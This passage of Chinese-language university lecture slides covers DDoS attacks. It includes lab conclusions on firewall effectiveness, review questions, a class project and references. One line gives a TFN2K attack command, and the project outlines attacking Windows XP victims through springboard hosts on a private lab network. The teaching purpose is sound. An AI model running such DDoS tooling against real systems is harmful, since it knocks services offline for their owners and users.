    • sudo ./tfn -f host.txt -c 0
slide120
結論

由架設實作(二)與架設實作(三) 可以發現當受害端的主機裝有防火牆時,阻擋約90%的DDoS攻擊,但仍有約10%的攻擊,被防火牆視為合法的網路連線而通過

從實驗結果,我們可知當DDoS攻擊的跳板主機數量夠大時,那無論是否有裝設防火牆,遭受攻擊的伺服器無法抵擋DDoS

網管人員必須搭配其它的網路設備或網路監控工具,才能有效防禦來自駭客的DDoS攻擊

slide122
習題

DDoS和DoS有何差異?

何謂Teardrop攻擊?它與Land攻擊有何不同?

請說明ICMP DoS攻擊主要二種實作攻擊模式

針對SYN Flood通常有哪些防護方式?

一般常見的DDoS攻擊工具有哪些?請列舉2種

slide124
專案目的

建置一DDoS實驗,並完成攻防實驗

利用實際操作的方式使同學了解DDoS攻擊手法與防禦之道

slide125
情境描述
  • yoyo是一位可愛的學妹,某天他在上網閒逛時,發現上網速度極慢,並且CPU使用率處於滿載狀態,他懷疑自己可能遭受DDoS攻擊。於是欲透過防火牆來監控是否遭受DDoS攻擊…
  • 請參考環境配置圖,模擬下列狀況
    • 於攻擊端安裝TFN2K工具
    • 對受害端進行攻擊行為
    • 觀察受害端電腦網路流量與CPU負荷情況
    • 受害端安裝防火牆,並觀察遭受攻擊時,其與受害端未安裝防火牆時之間的差異性

6-125

slide126
環境配置圖 (僅供參考請自行修改或簡化)

Victim2

OS: WINXP-SP2

IP:10.0.1.3

不安裝防火牆 (或關閉)

Victim1

OS: WINXP-SP2

IP:10.0.1.2

安裝防火牆

IP1

IP5

IP7

IP2

IP3

IP8

IP4

IP6

Springboard1

OS: FC6-yum-STD

IP1:10.0.1.4

IP2:10.0.2.5

Springboard4

OS: FC6-yum-STD

IP7:10.0.1.10

IP8:10.0.2.11

Springboard2

OS: FC6-yum-STD

IP3:10.0.1.6

IP4:10.0.2.7

Springboard3

OS: FC6-yum-STD

IP5:10.0.1.8

IP6:10.0.2.9

Attacker

OS: FC6-yum-STD

IP:10.0.2.1

安裝軟體:TFN2K

slide127
台灣思科系統。網路安全面面觀。2009年7月14日,取自http://www.cisco.com/web/TW/assets/docs/overview_doc03.pdf台灣思科系統。網路安全面面觀。2009年7月14日,取自http://www.cisco.com/web/TW/assets/docs/overview_doc03.pdf

台灣電腦網路危機處理曁協調中心(93年1月)。DDoS攻擊的趨勢與防禦策略。台灣電腦網路危機處理中心通訊,63。取自:http://www.cert.org.tw/document/column/show.php?key=73

台灣電腦網路危機處理曁協調中心(94年1月)。IDS偵測網路攻擊方法之改進。台灣電腦網路危機處理中心通訊,75。取自: http://www.cert.org.tw/document/column/show.php?key=85

台灣電腦網路危機處理曁協調中心(94年4月)。DDoS與DoS的發展與分類。台灣電腦網路危機處理中心通訊,78。取自: http://www.cert.org.tw/document/column/show.php?key=88

林世杰(民92年)。以異常偵測為基礎之入侵偵測系統研究-以微軟視窗平台為例。國立雲林科技大學資訊管理研究所碩士論文,雲林縣。

李駿偉、田筱榮、黃世昆。入侵偵測分析方法評估與比較。Communications of the CCISA,8 (2),21-37。

參考資料

6-127

slide128
林子傑(93年)。基於監控網路效能所提出之追蹤與緩和分散式阻斷服務攻擊的新方法。國立成功大學資訊工程學系碩士論文,台南市。林子傑(93年)。基於監控網路效能所提出之追蹤與緩和分散式阻斷服務攻擊的新方法。國立成功大學資訊工程學系碩士論文,台南市。

張智晴、林盈達(89年7月)。分散式Denial-of-Service攻擊事件的觀察。網路通訊,108。

鐘昌翰(民91年)。適用於分散式阻斷服務與分散式掃描之網路入侵偵測方法。國立交通大學資訊工程學系碩士論文,新竹市。

曾黎明、陳俊傑(民93年)。以重疊網路防禦分散式阻斷服務攻擊。國立中央大學資訊工程研究所論文,未出版,桃園縣。

呂芳懌、楊惟傑(民93 年)。DDoS攻擊之預警、偵測與追蹤。東海大學資訊工程與科學研究所論文,未出版,台中市。

嚴威、李明舫(民93 年)。以倒傳遞類神經網路防禦應用層之分散式阻斷攻擊之整體架構。大同大學資訊工程研究所論文,未出版,台北市。

參考資料 (續)

6-128

slide129
周立德、林柏昇(民92年)。抵禦DDoS攻擊之階層式聯合防衛系統。國立中央大學資訊工程研究所論文,未出版,桃園縣。周立德、林柏昇(民92年)。抵禦DDoS攻擊之階層式聯合防衛系統。國立中央大學資訊工程研究所論文,未出版,桃園縣。

馬淑貞、魏志平(民94年)。以網路流量資料探勘協助進行阻斷服務攻擊偵測與防禦之研究。中山大學資訊管理學所論文,未出版,高雄市。

楊中皇(民97年)。網路安全:理論與實務(2版) 。台北市:學貫。

林祝興、張真誠(民95年)。電子商務安全技術與應用。台北市:旗標。

TWCERT/CC(無日期)。DDoS攻擊的趨勢與防禦策略。2009年7月12日,取自:http://www.cert.org.tw/document/column/show.php?key=73

許建隆(無日期)。網路駭客攻擊-分散式阻斷服務(DDoS)攻擊。2009年7月12日,取自:D. Elson. (2000, March 27). Intrusion Detection, Theory and Practice. Retrieved July 12, 2009, from the World Wide Web: http://www.securityfocus.com/infocus/1203

Danny Nicholas (民99年) 。從Amazon EC2攻擊事件看雲端應用安全。 2010年4月12日,取自: www.runpc.com.tw/content/cloud_ content. aspx?id =105729

參考資料 (續)

6-129

slide130
F. Kargl, J. Marier, S. Schlott, and M. Weber, “Protecting Web Servers from Distributed Denial of Service Attacks,” Proceedings of the International WWW Conference (WWW 10), Hong Kong, May 1-5, 2001.

S. Mukkamala, and A.H. Sung, “Detecting Denial of Service Attacks Using Support Vector Machines,” Proceedings of the 12th IEEE International Conference on Fuzzy Systems, 2003, pp.1231-1236.

J. Lee and G. d. Veciana, “Scalable multicast based filtering and tracing framework for defeating distributed DoS attacks,” International Journal of Network Management, 2005, pp. 43-60.

R. K. Chang, “Defending against Flooding-based. Distributed denial-of- service attacks: a tutorial,” IEEE. Communications Magazine, Volume: 40 Issue: 10, Oct. 2002, pp. 42-51.

L. Garber, “Denial-of-service attacks rip the internet,” IEEE Computer, Vol. 33 , No. 4, April 2000, pp. 12-17.

參考資料 (續)

6-130

ad